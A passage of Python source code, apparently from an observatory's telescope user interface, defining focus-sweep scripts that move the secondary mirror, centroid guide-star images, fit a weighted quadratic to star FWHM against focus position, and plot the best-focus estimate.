- extremeFocPos: extremes of focus position
- extremeFWHM: extremes of FWHM
- setFocRange: adjust displayed focus range?
extremes are an Extremes object with .minVal and .maxVal
"""
# "graphFocusMeas(focPosFWHMList=%s, extremeFocPos=%r, extremeFWHM=%r)" % (focPosFWHMList, extremeFocPos, extremeFWHM)
numMeas = len(focPosFWHMList)
if numMeas == 0:
return
focList, fwhmList = zip(*focPosFWHMList)
if not self.plotLine:
self.plotLine = self.plotAxis.plot(focList, fwhmList, 'bo')[0]
else:
self.plotLine.set_data(focList[:], fwhmList[:])
self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
def initAll(self):
"""Initialize variables, table and graph.
"""
# initialize shared variables
self.didTakeImage = False
self.focDir = None
self.currBoreXYDeg = None
self.begBoreXYDeg = None
self.instScale = None
self.arcsecPerPixel = None
self.instCtr = None
self.instLim = None
self.cmdMode = None
self.focPosToRestore = None
self.expTime = None
self.absStarPos = None
self.relStarPos = None
self.binFactor = None
self.window = None # LL pixel is 0, UL pixel is included
self.enableCmdBtns(False)
def logFitFWHM(self, name, focPos, fwhm):
"""Log a fit value of FWHM or FWHM error.
"""
if fwhm is not None:
fwhmArcSec = fwhm * self.arcsecPerPixel * self.binFactor
else:
fwhmArcSec = None
dataStrs = (
formatNum(focPos, "%0.0f"),
formatNum(fwhm, "%0.1f"),
formatNum(fwhmArcSec, "%0.2f"),
)
outStr = "%s\t%s" % (name, "\t".join(dataStrs))
self.logWdg.addMsg(outStr)
def logStarMeas(self, name, focPos, starMeas):
"""Log a star measurement.
The name should be less than 8 characters long.
Any or all data fields in starMeas may be None.
Inputs:
- focPos: focus position, in um
- starMeas: StarMeas object
If fwhm is None, it is reported as NaN.
"""
fwhm = starMeas.fwhm
if fwhm is not None:
fwhmArcSec = fwhm * self.arcsecPerPixel * self.binFactor
else:
fwhmArcSec = None
if None not in (starMeas.ampl, starMeas.sky):
skyPlusAmpl = starMeas.ampl + starMeas.sky
else:
skyPlusAmpl = None
dataStrs = (
formatNum(focPos, "%0.0f"),
formatNum(fwhm, "%0.1f"),
formatNum(fwhmArcSec, "%0.2f"),
formatNum(starMeas.sky, "%0.0f"),
formatNum(starMeas.ampl, "%0.0f"),
formatNum(skyPlusAmpl, "%0.0f"),
)
outStr = "%s\t%s" % (name, "\t".join(dataStrs))
self.logWdg.addMsg(outStr)
def recordUserParams(self, doStarPos=True):
"""Record user-set parameters relating to exposures but not to focus
Inputs:
- doStarPos: if true: save star position and related information;
warning: if doStarPos true then there must *be* a valid star position
Set the following instance variables:
- expTime
- centroidRadPix
The following are set to None if doStarPos false:
- absStarPos
- relStarPos
- window
"""
self.expTime = self.getEntryNum(self.expTimeWdg)
self.binFactor = self.dispBinFactor
centroidRadArcSec = self.getEntryNum(self.centroidRadWdg)
self.centroidRadPix = centroidRadArcSec / (self.arcsecPerPixel * self.binFactor)
if doStarPos:
winRad = self.centroidRadPix * self.WinSizeMult
self.absStarPos = [None, None]
for ii in range(2):
wdg = self.starPosWdgSet[ii]
self.absStarPos[ii] = self.getEntryNum(wdg)
if self.doWindow:
windowMinXY = [max(self.instLim[ii], int(0.5 + self.absStarPos[ii] - winRad)) for ii in range(2)]
windowMaxXY = [min(self.instLim[ii-2], int(0.5 + self.absStarPos[ii] + winRad)) for ii in range(2)]
self.window = windowMinXY + windowMaxXY
self.relStarPos = [self.absStarPos[ii] - windowMinXY[ii] for ii in range(2)]
#print "winRad=%s, windowMinXY=%s, relStarPos=%s" % (winRad, windowMinXY, self.relStarPos)
else:
self.window = None
self.relStarPos = self.absStarPos[:]
else:
self.absStarPos = None
self.relStarPos = None
self.window = None
def run(self, sr):
"""Run the focus script.
"""
self.initAll()
# fake data for debug mode
# iteration #, FWHM
self.debugIterFWHM = (1, 2.0)
self.getInstInfo()
yield self.waitExtraSetup()
# open image viewer window, if any
if self.imageViewerTLName:
self.tuiModel.tlSet.makeVisible(self.imageViewerTLName)
self.sr.master.winfo_toplevel().lift()
focPosFWHMList = []
extremeFocPos = Extremes()
extremeFWHM = Extremes()
# check that the gcam actor is alive. This is important because
# centroid commands can fail due to no actor or no star
# so we want to halt in the former case
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = "ping",
)
# command loop; repeat until error or user explicitly presses Stop
if self.maxFindAmpl is None:
btnStr = "Measure or Sweep"
else:
btnStr = "Find, Measure or Sweep"
waitMsg = "Press %s to continue" % (btnStr,)
testNum = 0
while True:
# wait for user to press the Expose or Sweep button
# note: the only time they should be enabled is during this wait
self.enableCmdBtns(True)
sr.showMsg(waitMsg, RO.Constants.sevWarning)
yield sr.waitUser()
self.enableCmdBtns(False)
if self.cmdMode == self.cmd_Sweep:
break
if testNum == 0:
self.clearGraph()
if self.maxFindAmpl is None:
self.logWdg.addMsg("===== Measure =====")
else:
self.logWdg.addMsg("===== Find/Measure =====")
testNum += 1
focPos = float(self.centerFocPosWdg.get())
if focPos is None:
raise sr.ScriptError("must specify center focus")
yield self.waitSetFocus(focPos, False)
if self.cmdMode == self.cmd_Measure:
cmdName = "Meas"
self.recordUserParams(doStarPos=True)
yield self.waitCentroid()
elif self.cmdMode == self.cmd_Find:
cmdName = "Find"
self.recordUserParams(doStarPos=False)
yield self.waitFindStar()
starData = sr.value
if starData.xyPos is not None:
sr.showMsg("Found star at %0.1f, %0.1f" % tuple(starData.xyPos))
self.setStarPos(starData.xyPos)
else:
raise RuntimeError("Unknown command mode: %r" % (self.cmdMode,))
starMeas = sr.value
self.logStarMeas("%s %d" % (cmdName, testNum,), focPos, starMeas)
fwhm = starMeas.fwhm
if fwhm is None:
waitMsg = "No star found! Fix and then press %s" % (btnStr,)
self.setGraphRange(extremeFocPos=extremeFocPos)
else:
extremeFocPos.addVal(focPos)
extremeFWHM.addVal(starMeas.fwhm)
focPosFWHMList.append((focPos, fwhm))
self.graphFocusMeas(focPosFWHMList, extremeFocPos, extremeFWHM)
waitMsg = "%s done; press %s to continue" % (cmdName, btnStr,)
self.recordUserParams(doStarPos=True)
yield self.waitFocusSweep()
doRestoreBoresight = self.begBoreXYDeg != self.currBoreXYDeg
if doRestoreBoresight:
yield self.moveBoresight(
self.begBoreXYDeg,
msgStr ="Restoring original boresight position",
doWait = True,
)
if self.didTakeImage and (self.doWindow or doRestoreBoresight):
self.didTakeImage = False # to prevent end from taking another image
self.sr.showMsg("Taking a final image")
exposeCmdDict = self.getExposeCmdDict(doWindow=False)
yield sr.waitCmd(**exposeCmdDict)
def setCurrFocus(self, *args):
"""Set center focus to current focus.
"""
currFocus = self.sr.getKeyVar(self.tccModel.secFocus, defVal=None)
if currFocus is None:
self.sr.showMsg("Current focus not known",
severity=RO.Constants.sevWarning,
)
return
self.centerFocPosWdg.set(currFocus)
self.sr.showMsg("")
def setGraphRange(self, extremeFocPos=None, extremeFWHM=None):
"""Sets the displayed range of the graph.
Inputs:
- extremeFocPos: focus extremes
- extremeFWHM: FWHM extremes
"""
# "setGraphRange(extremeFocPos=%s, extremeFWHM=%s)" % (extremeFocPos, extremeFWHM)
if extremeFocPos and extremeFocPos.isOK():
minFoc = extremeFocPos.minVal - self.FocGraphMargin
maxFoc = extremeFocPos.maxVal + self.FocGraphMargin
if maxFoc - minFoc < 50:
minFoc -= 25
maxFoc += 25
self.plotAxis.set_xlim(minFoc, maxFoc)
if extremeFWHM and extremeFWHM.isOK():
minFWHM = extremeFWHM.minVal * 0.95
maxFWHM = extremeFWHM.maxVal * 1.05
self.plotAxis.set_ylim(minFWHM, maxFWHM)
self.figCanvas.draw()
def setStarPos(self, starXYPix):
"""Set star position widgets.
Inputs:
- starXYPix: star x, y position (binned pixels)
"""
for ii in range(2):
wdg = self.starPosWdgSet[ii]
wdg.set(starXYPix[ii])
def updBinFactor(self, *args, **kargs):
"""Called when the user changes the bin factor"""
newBinFactor = self.binFactorWdg.getNum()
if newBinFactor <= 0:
return
oldBinFactor = self.dispBinFactor
if oldBinFactor == newBinFactor:
return
self.dispBinFactor = newBinFactor
# adjust displayed star position
posFactor = float(oldBinFactor) / float(newBinFactor)
for ii in range(2):
oldStarPos = self.starPosWdgSet[ii].getNum()
if oldStarPos == 0:
continue
newStarPos = oldStarPos * posFactor
self.starPosWdgSet[ii].set(newStarPos)
def updFocusIncr(self, *args):
"""Update focus increment widget.
"""
focusRange = self.focusRangeWdg.getNumOrNone()
numPos = self.numFocusPosWdg.getNumOrNone()
if None in (focusRange, numPos):
self.focusIncrWdg.set(None, isCurrent = False)
return
focusIncr = focusRange / float(numPos - 1)
isOK = focusIncr >= self.MinFocusIncr
if not isOK:
errMsg = "Focus increment too small (< %s %s)" % (self.MinFocusIncr, MicronStr)
self.sr.showMsg(errMsg, RO.Constants.sevWarning)
self.focusIncrWdg.set(focusIncr, isCurrent = isOK)
def waitCentroid(self):
"""Take an exposure and centroid using 1x1 binning.
If the centroid is found, sets sr.value to the FWHM.
Otherwise sets sr.value to None.
"""
sr = self.sr
centroidCmdStr = "centroid on=%0.1f,%0.1f cradius=%0.1f %s" % \
(self.relStarPos[0], self.relStarPos[1], self.centroidRadPix, self.formatExposeArgs())
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = centroidCmdStr,
keyVars = (self.guideModel.files, self.guideModel.star),
checkFail = False,
)
cmdVar = sr.value
self.didTakeImage = True
if sr.debug:
starData = makeStarData("c", self.relStarPos)
else:
starData = cmdVar.getKeyVarData(self.guideModel.star)
if starData:
sr.value = StarMeas.fromStarKey(starData[0])
return
else:
sr.value = StarMeas()
if not cmdVar.getKeyVarData(self.guideModel.files):
raise sr.ScriptError("exposure failed")
def waitExtraSetup(self):
"""Executed once at the start of each run
after calling initAll and getInstInfo but before doing anything else.
Override to do things such as move the boresight or put the instrument into a particular mode.
"""
yield self.sr.waitMS(1)
def waitFindStar(self):
"""Take a full-frame exposure and find the best star that can be centroided.
Sets sr.value to StarMeas.
Displays a warning if no star found.
"""
sr = self.sr
if self.maxFindAmpl is None:
raise RuntimeError("Find disabled; maxFindAmpl=None")
self.sr.showMsg("Exposing %s sec to find best star" % (self.expTime,))
findStarCmdStr = "findstars " + self.formatExposeArgs(doWindow=False)
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = findStarCmdStr,
keyVars = (self.guideModel.files, self.guideModel.star),
checkFail = False,
)
cmdVar = sr.value
self.didTakeImage = True
if self.sr.debug:
filePath = "debugFindFile"
else:
if not cmdVar.getKeyVarData(self.guideModel.files):
raise sr.ScriptError("exposure failed")
fileInfo = cmdVar.getKeyVarData(self.guideModel.files)[0]
filePath = "".join(fileInfo[2:4])
if self.sr.debug:
starDataList = makeStarData("f", (50.0, 75.0))
else:
starDataList = cmdVar.getKeyVarData(self.guideModel.star)
if not starDataList:
sr.value = StarMeas()
self.sr.showMsg("No stars found", severity=RO.Constants.sevWarning)
return
yield self.waitFindStarInList(filePath, starDataList)
def waitFindStarInList(self, filePath, starDataList):
"""Find best centroidable star in starDataList.
If a suitable star is found: set starXYPos to position
and sr.value to the star FWHM.
Otherwise log a warning and set sr.value to None.
Inputs:
- filePath: image file path on hub, relative to image root
(e.g. concatenate items 2:4 of the guider Files keyword)
- starDataList: list of star keyword data
"""
sr = self.sr
if self.maxFindAmpl is None:
raise RuntimeError("Find disabled; maxFindAmpl=None")
for starData in starDataList:
starXYPos = starData[2:4]
starAmpl = starData[14]
if (starAmpl is None) or (starAmpl > self.maxFindAmpl):
continue
sr.showMsg("Centroiding star at %0.1f, %0.1f" % tuple(starXYPos))
centroidCmdStr = "centroid file=%s on=%0.1f,%0.1f cradius=%0.1f" % \
(filePath, starXYPos[0], starXYPos[1], self.centroidRadPix)
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = centroidCmdStr,
keyVars = (self.guideModel.star,),
checkFail = False,
)
cmdVar = sr.value
if sr.debug:
starData = makeStarData("f", starXYPos)
else:
starData = cmdVar.getKeyVarData(self.guideModel.star)
if starData:
sr.value = StarMeas.fromStarKey(starData[0])
return
sr.showMsg("No usable star fainter than %s ADUs found" % self.maxFindAmpl,
severity=RO.Constants.sevWarning)
sr.value = StarMeas()
def waitFocusSweep(self):
"""Conduct a focus sweep.
Sets sr.value to True if successful.
"""
sr = self.sr
focPosFWHMList = []
self.logWdg.addMsg("===== Sweep =====")
self.clearGraph()
centerFocPos = float(self.getEntryNum(self.centerFocPosWdg))
focusRange = float(self.getEntryNum(self.focusRangeWdg))
startFocPos = centerFocPos - (focusRange / 2.0)
endFocPos = startFocPos + focusRange
numFocPos = self.getEntryNum(self.numFocusPosWdg)
if numFocPos < 3:
raise sr.ScriptError("need at least three focus positions")
focusIncr = self.focusIncrWdg.getNum()
if focusIncr < self.MinFocusIncr:
raise sr.ScriptError("focus increment too small (< %s %s)" % (self.MinFocusIncr, MicronStr))
self.focDir = (endFocPos > startFocPos)
extremeFocPos = Extremes(startFocPos)
extremeFocPos.addVal(endFocPos)
extremeFWHM = Extremes()
self.setGraphRange(extremeFocPos=extremeFocPos)
numMeas = 0
self.focPosToRestore = centerFocPos
for focInd in range(numFocPos):
focPos = float(startFocPos + (focInd*focusIncr))
doBacklashComp = (focInd == 0)
yield self.waitSetFocus(focPos, doBacklashComp)
sr.showMsg("Exposing for %s sec at focus %0.0f %s" % \
(self.expTime, focPos, MicronStr))
yield self.waitCentroid()
starMeas = sr.value
if sr.debug:
starMeas.fwhm = 0.0001 * (focPos - centerFocPos) ** 2
starMeas.fwhm += random.gauss(1.0, 0.25)
extremeFWHM.addVal(starMeas.fwhm)
self.logStarMeas("Sw %d" % (focInd+1,), focPos, starMeas)
if starMeas.fwhm is not None:
focPosFWHMList.append((focPos, starMeas.fwhm))
self.graphFocusMeas(focPosFWHMList, extremeFWHM=extremeFWHM)
# Fit a curve to the data
numMeas = len(focPosFWHMList)
if numMeas < 3:
raise sr.ScriptError("need at least 3 measurements to fit best focus")
focList, fwhmList = zip(*focPosFWHMList)
focPosArr = numpy.array(focList, dtype=float)
fwhmArr = numpy.array(fwhmList, dtype=float)
weightArr = numpy.ones(numMeas, dtype=float)
if numMeas > 3:
coeffs, dumYFit, dumYBand, fwhmSigma, dumCorrMatrix = polyfitw(focPosArr, fwhmArr, weightArr, 2, True)
elif numMeas == 3:
# too few points to measure fwhmSigma
coeffs = polyfitw(focPosArr, fwhmArr, weightArr, 2, False)
fwhmSigma = None
# Make sure fit curve has a minimum
if coeffs[2] <= 0.0:
raise sr.ScriptError("could not find minimum focus")
# find the best focus position
bestEstFocPos = (-1.0*coeffs[1])/(2.0*coeffs[2])
bestEstFWHM = coeffs[0]+coeffs[1]*bestEstFocPos+coeffs[2]*bestEstFocPos*bestEstFocPos
extremeFocPos.addVal(bestEstFocPos)
extremeFWHM.addVal(bestEstFWHM)
self.logFitFWHM("Fit", bestEstFocPos, bestEstFWHM)
# compute and log standard deviation, if possible
if fwhmSigma is not None:
focSigma = math.sqrt(fwhmSigma / coeffs[2])
self.logFitFWHM(u"Fit \N{GREEK SMALL LETTER SIGMA}", focSigma, fwhmSigma)
else:
focSigma = None
self.logWdg.addMsg(u"Warning: too few points to compute \N{GREEK SMALL LETTER SIGMA}")
# plot fit as a curve and best fit focus as a point
fitFocArr = numpy.arange(min(focPosArr), max(focPosArr), 1)
fitFWHMArr = coeffs[0] + coeffs[1]*fitFocArr + coeffs[2]*(fitFocArr**2.0)
self.plotAxis.plot(fitFocArr, fitFWHMArr, '-k', linewidth=2)
self.plotAxis.plot([bestEstFocPos], [bestEstFWHM], 'go')
self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
# check fit error
if focSigma is not None:
maxFocSigma = self.MaxFocSigmaFac * focusRange
if focSigma > maxFocSigma:
raise sr.ScriptError("focus std. dev. too large: %0.0f > %0.0f" % (focSigma, maxFocSigma))
# check that estimated best focus is in sweep range
if not startFocPos <= bestEstFocPos <= endFocPos:
raise sr.ScriptError("best focus=%0.0f out of sweep range" % (bestEstFocPos,))
# move to best focus if "Move to best Focus" checked
moveBest = self.moveBestFocus.getBool()
if not moveBest:
return
self.setCurrFocus()
yield self.waitSetFocus(bestEstFocPos, doBacklashComp=True)
sr.showMsg("Exposing for %s sec at estimated best focus %d %s" % \
(self.expTime, bestEstFocPos, MicronStr))
yield self.waitCentroid()
finalStarMeas = sr.value
if sr.debug:
finalStarMeas.fwhm = 1.1
extremeFWHM.addVal(finalStarMeas.fwhm)
self.logStarMeas("Meas", bestEstFocPos, finalStarMeas)
finalFWHM = finalStarMeas.fwhm
if finalFWHM is not None:
self.plotAxis.plot([bestEstFocPos], [finalFWHM], 'ro')
self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
else:
raise sr.ScriptError("could not measure FWHM at estimated best focus")
# A new best focus was picked; don't restore the original focus
# and do set Center Focus to the new focus
self.focPosToRestore = None
self.centerFocPosWdg.set(int(round(bestEstFocPos)))
def waitSetFocus(self, focPos, doBacklashComp=False):
"""Adjust focus.
To use: yield waitSetFocus(...)
Inputs:
- focPos: new focus position in um
- doBacklashComp: if True, perform backlash compensation
"""
sr = self.sr
focPos = float(focPos)
# to try to eliminate the backlash in the secondary mirror drive move back 1/2 the
# distance between the start and end position from the bestEstFocPos
if doBacklashComp and self.BacklashComp:
backlashFocPos = focPos - (abs(self.BacklashComp) * self.focDir)
sr.showMsg("Backlash comp: moving focus to %0.0f %s" % (backlashFocPos, MicronStr))
yield sr.waitCmd(
actor = "tcc",
cmdStr = "set focus=%0.0f" % (backlashFocPos,),
)
yield sr.waitMS(self.FocusWaitMS)
# move to desired focus position
sr.showMsg("Moving focus to %0.0f %s" % (focPos, MicronStr))
yield sr.waitCmd(
actor = "tcc",
cmdStr = "set focus=%0.0f" % (focPos,),
)
yield sr.waitMS(self.FocusWaitMS)
class SlitviewerFocusScript(BaseFocusScript):
"""Focus script for slitviewers
Inputs:
- gcamActor: name of guide camera actor (e.g. "dcam")
- instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
- imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
- defBoreXY: default boresight position in [x, y] arcsec;
If an entry is None then no offset widget is shown for that axis
and 0 is used.
- defRadius: default centroid radius, in arcsec
- defBinFactor: default bin factor; if None then bin factor cannot be set
- doWindow: if True, subframe images during focus sequence
- windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
this is not use for star positions, which all have the same convention
- windowIsInclusive: is the upper-right window coord included in the image?
- helpURL: URL of help file
- debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
"""
def __init__(self,
sr,
gcamActor,
instName,
imageViewerTLName,
defBoreXY,
defRadius = 5.0,
defBinFactor = 1,
doWindow = True,
windowOrigin = 0,
windowIsInclusive = True,
helpURL = None,
debug = False,
):
"""The setup script; run once when the script runner
window is created.
"""
if len(defBoreXY) != 2:
raise ValueError("defBoreXY=%s must be a pair of values" % defBoreXY)
self.defBoreXY = defBoreXY
BaseFocusScript.__init__(self,
sr = sr,
gcamActor = gcamActor,
instName = instName,
imageViewerTLName = imageViewerTLName,
defRadius = defRadius,
defBinFactor = defBinFactor,
canSetStarPos = False,
maxFindAmpl = None,
doWindow = doWindow,
windowOrigin = windowOrigin,
windowIsInclusive = windowIsInclusive,
helpURL = helpURL,
debug = debug,
)
def createSpecialWdg(self):
"""Create boresight widget(s).
"""
sr = self.sr
self.boreNameWdgSet = []
for ii in range(2):
showWdg = (self.defBoreXY[ii] is not None)
if showWdg:
defVal = float(self.defBoreXY[ii])
else:
defVal = 0.0
letter = ("X", "Y")[ii]
wdgLabel = "Boresight %s" % (letter,)
boreWdg = RO.Wdg.FloatEntry(
master = sr.master,
label = wdgLabel,
minValue = -60.0,
maxValue = 60.0,
defValue = defVal,
defMenu = "Default",
helpText = wdgLabel + " position",
helpURL = self.helpURL,
)
if showWdg:
self.gr.gridWdg(boreWdg.label, boreWdg, "arcsec")
self.boreNameWdgSet.append(boreWdg)
def moveBoresight(self, boreXYDeg, msgStr="Moving the boresight", doWait=True):
"""Move the boresight to the specified position and sets starPos accordingly.
Waits if doWait true (in which case you must use "yield").
Records the initial boresight position in self.begBoreXYDeg, if not already done.
"""
sr = self.sr
cmdStr = "offset boresight %0.7f, %0.7f/pabs/computed" % (boreXYDeg[0], boreXYDeg[1])
# save the initial boresight position, if not already done
if self.begBoreXYDeg is None:
begBorePVTs = sr.getKeyVar(self.tccModel.boresight, ind=None)
if not sr.debug:
begBoreXYDeg = [RO.CnvUtil.posFromPVT(pvt) for pvt in begBorePVTs]
if None in begBoreXYDeg:
raise sr.ScriptError("current boresight position unknown")
self.begBoreXYDeg = begBoreXYDeg
else:
self.begBoreXYDeg = [0.0, 0.0]
# "self.begBoreXYDeg=%r" % self.begBoreXYDeg
# move boresight and adjust star position accordingly
starXYPix = [(boreXYDeg[ii] * self.instScale[ii]) + self.instCtr[ii] for ii in range(2)]
if msgStr:
sr.showMsg(msgStr)
self.currBoreXYDeg = boreXYDeg
self.setStarPos(starXYPix)
if doWait:
yield sr.waitCmd(
actor = "tcc",
cmdStr = cmdStr,
)
else:
sr.startCmd(
actor = "tcc",
cmdStr = cmdStr,
)
def waitExtraSetup(self):
"""Executed once at the start of each run
after calling initAll and getInstInfo but before doing anything else.
Override to do things such as put the instrument into a particular mode.
"""
# set boresight and star position and shift boresight
boreXYDeg = [self.getEntryNum(wdg) / 3600.0 for wdg in self.boreNameWdgSet]
yield self.moveBoresight(boreXYDeg, doWait=True)
class OffsetGuiderFocusScript(BaseFocusScript):
"""Focus script for offset guiders
Inputs:
- gcamActor: name of guide camera actor (e.g. "dcam")
- instPos: name of instrument position (e.g. "NA2"); case doesn't matter
- imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
- defBoreXY: default boresight position in [x, y] arcsec;
If an entry is None then no offset widget is shown for that axis
and 0 is used.
- defRadius: default centroid radius, in arcsec
- defBinFactor: default bin factor; if None then bin factor cannot be set
- maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
if None then star finding is disabled.
- doWindow: if True, subframe images during focus sequence
- windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
this is not use for star positions, which all have the same convention
- windowIsInclusive: is the upper-right window coord included in the image?
- helpURL: URL of help file
- debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
"""
def __init__(self,
sr,
gcamActor,
instPos,
imageViewerTLName,
defRadius = 5.0,
defBinFactor = 1,
maxFindAmpl = None,
doWindow = True,
windowOrigin = 0,
windowIsInclusive = True,
helpURL = None,
debug = False,
):
"""The setup script; run once when the script runner
window is created.
"""
BaseFocusScript.__init__(self,
sr = sr,
gcamActor = gcamActor,
instName = None,
imageViewerTLName = imageViewerTLName,
defRadius = defRadius,
defBinFactor = defBinFactor,
maxFindAmpl = maxFindAmpl,
doWindow = doWindow,
windowOrigin = windowOrigin,
windowIsInclusive = windowIsInclusive,
helpURL = helpURL,
debug = debug,
)
self.instPos = instPos
def getInstInfo(self):
"""Obtains instrument data (in this case guider data).
Verifies the correct instrument and sets these attributes:
- instScale: x,y image scale in unbinned pixels/degree
- instCtr: x,y image center in unbinned pixels
- instLim: xmin, ymin, xmax, ymax image limits, inclusive, in unbinned pixels
- arcsecPerPixel: image scale in arcsec/unbinned pixel;
average of x and y scales
Raises ScriptError if wrong instrument.
"""
sr = self.sr
if not sr.debug:
# Make sure current instrument is correct
try:
currInstPosName = sr.getKeyVar(self.tccModel.instPos)
except sr.ScriptError:
raise sr.ScriptError("current instrument position unknown")
if not currInstPosName.lower() == self.instPos.lower():
raise sr.ScriptError("%s is not the current instrument position (%s)!" % (self.instPos, currInstPosName))
self.instScale = sr.getKeyVar(self.tccModel.gimScale, ind=None)
self.instCtr = sr.getKeyVar(self.tccModel.gimCtr, ind=None)
self.instLim = sr.getKeyVar(self.tccModel.gimLim, ind=None)
else:
# data from tcc tinst:I_NA2_DIS.DAT 18-OCT-2006
self.instScale = [-12066.6, 12090.5] # unbinned pixels/deg
self.instCtr = [240, 224]
self.instLim = [0, 0, 524, 511]
self.arcsecPerPixel = 3600.0 * 2 / (abs(self.instScale[0]) + abs(self.instScale[1]))
class ImagerFocusScript(BaseFocusScript):
"""Focus script for imaging instrument.
This is like an Offset Guider but the exposure commands
are sent to the instrument actor and centroid and findstars commands
are sent to nexpose using the image just taken.
For now there is no standard way to handle windowing and binning
so each instrument must override waitExpose to use windowing.
As a result the default value of doWindow is false.
However, if the exposure command gets arguments for windowing
then this will all change.
Inputs:
- instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
- imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
- defRadius: default centroid radius, in arcsec
- defBinFactor: default bin factor; if None then bin factor cannot be set
- maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
if None then star finding is disabled.
- doWindow: if True, subframe images during focus sequence
- windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
this is not use for star positions, which all have the same convention
- windowIsInclusive: is the upper-right window coord included in the image?
- doZeroOverscan: if True then set overscan to zero
- helpURL: URL of help file
- debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
"""
def __init__(self,
sr,
instName,
imageViewerTLName = None,
defRadius = 5.0,
defBinFactor = 1,
maxFindAmpl = None,
doWindow = False,
windowOrigin = 1,
windowIsInclusive = True,
doZeroOverscan = False,
helpURL = None,
debug = False,
):
"""The setup script; run once when the script runner
window is created.
"""
# this is a hack for now
gcamActor = {
"nicfps": "nfocus",
"spicam": "sfocus",
}[instName.lower()]
BaseFocusScript.__init__(self,
sr = sr,
gcamActor = gcamActor,
instName = instName,
imageViewerTLName = imageViewerTLName,
defRadius = defRadius,
defBinFactor = defBinFactor,
maxFindAmpl = maxFindAmpl,
doWindow = doWindow,
windowOrigin = windowOrigin,
windowIsInclusive = windowIsInclusive,
helpURL = helpURL,
debug = debug,
)
self.exposeModel = TUI.Inst.ExposeModel.getModel(instName)
self.doZeroOverscan = bool(doZeroOverscan)
def formatBinFactorArg(self):
"""Return bin factor argument for expose/centroid/findstars command"""
if self.defBinFactor is None:
return ""
return "bin=%d,%d" % (self.binFactor, self.binFactor)
def formatExposeArgs(self, doWindow=True):
"""Format arguments for exposure command.
Inputs:
- doWindow: if true, window the exposure (if permitted)
"""
try:
retStr = BaseFocusScript.formatExposeArgs(self, doWindow)
except TypeError:
# try to shed light on an intermittent bug
print "Focus script bug diagnostic information"
print "self.__class__ =", self.__class__
print "inheritance tree =", inspect.getclasstree([self.__class__])
raise
retStr += " name=%s_focus" % (self.exposeModel.instInfo.instActor,)
if self.doZeroOverscan:
retStr += " overscan=0,0"
return retStr
def waitCentroid(self):
"""Take an exposure and centroid using 1x1 binning.
If the centroid is found, sets sr.value to the FWHM.
Otherwise sets sr.value to None.
"""
sr = self.sr
yield self.waitExpose()
filePath = sr.value
centroidCmdStr = "centroid file=%s on=%0.1f,%0.1f cradius=%0.1f" % \
(filePath, self.relStarPos[0], self.relStarPos[1], self.centroidRadPix)
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = centroidCmdStr,
keyVars = (self.guideModel.star,),
checkFail = False,
)
cmdVar = sr.value
if sr.debug:
starData = makeStarData("c", self.relStarPos)
else:
starData = cmdVar.getKeyVarData(self.guideModel.star)
if starData:
sr.value = StarMeas.fromStarKey(starData[0])
else:
sr.value = StarMeas()
def getExposeCmdDict(self, doWindow=True):
"""Get basic command arument dict for an expose command
This includes actor, cmdStr, abortCmdStr
"""
return dict(
actor = self.exposeModel.actor,
cmdStr = "object " + self.formatExposeArgs(doWindow),
abortCmdStr = "abort",
)
def waitExpose(self, doWindow=True):
"""Take an exposure.
Return the file path of the exposure in sr.value.
Raise ScriptError if the exposure fails.
"""
sr = self.sr
self.sr.showMsg("Exposing for %s sec" % (self.expTime,))
basicCmdDict = self.getExposeCmdDict(doWindow)
yield sr.waitCmd(
keyVars = (self.exposeModel.files,),
checkFail = False,
**basicCmdDict
)
cmdVar = sr.value
fileInfoList = cmdVar.getKeyVarData(self.exposeModel.files)
if self.sr.debug:
fileInfoList = [("me", "localhost", "tmp", "debug", "me", "test.fits")]
if not fileInfoList:
raise self.sr.ScriptError("exposure failed")
filePath = "".join(fileInfoList[0][2:6])
sr.value = filePath
def waitFindStar(self):
"""Take a full-frame exposure and find the best star that can be centroided.
Set sr.value to StarMeas for found star.
If no star found displays a warning and sets sr.value to empty StarMeas.
"""
sr = self.sr
yield self.waitExpose(doWindow=False)
filePath = sr.value
findStarCmdStr = "findstars file=%s" % (filePath,)
yield sr.waitCmd(
actor = self.gcamActor,
cmdStr = findStarCmdStr,
keyVars = (self.guideModel.star,),
checkFail = False,
)
cmdVar = sr.value
self.didTakeImage = True
if self.sr.debug:
starDataList = makeStarData("f", (50.0, 75.0))
else:
starDataList = cmdVar.getKeyVarData(self.guideModel.star)
if not starDataList:
sr.value = StarMeas()
self.sr.showMsg("No stars found", severity=RO.Constants.sevWarning)
return
yield self.waitFindStarInList(filePath, starDataList)
def polyfitw(x, y, w, ndegree, return_fit=False):
"""
Performs a weighted least-squares polynomial fit with optional error estimates.
Inputs:
x:
The independent variable vector.
y:
The dependent variable vector. This vector should be the same
length as X.
w:
The vector of weights. This vector should be same length as
X and Y.
ndegree:
The degree of polynomial to fit.
Outputs:
If return_fit is false (the default) then polyfitw returns only C, a vector of
coefficients of length ndegree+1.
If return_fit is true then polyfitw returns a tuple (c, yfit, yband, sigma, a)
yfit:
The vector of calculated Y's. Has an error of + or - yband.
yband:
Error estimate for each point = 1 sigma.
sigma:
The standard deviation in Y units.
a:
Correlation matrix of the coefficients.
Written by: George Lawrence, LASP, University of Colorado,
December, 1981 in IDL.
Weights added, April, 1987, G. Lawrence
Fixed bug with checking number of params, November, 1998,
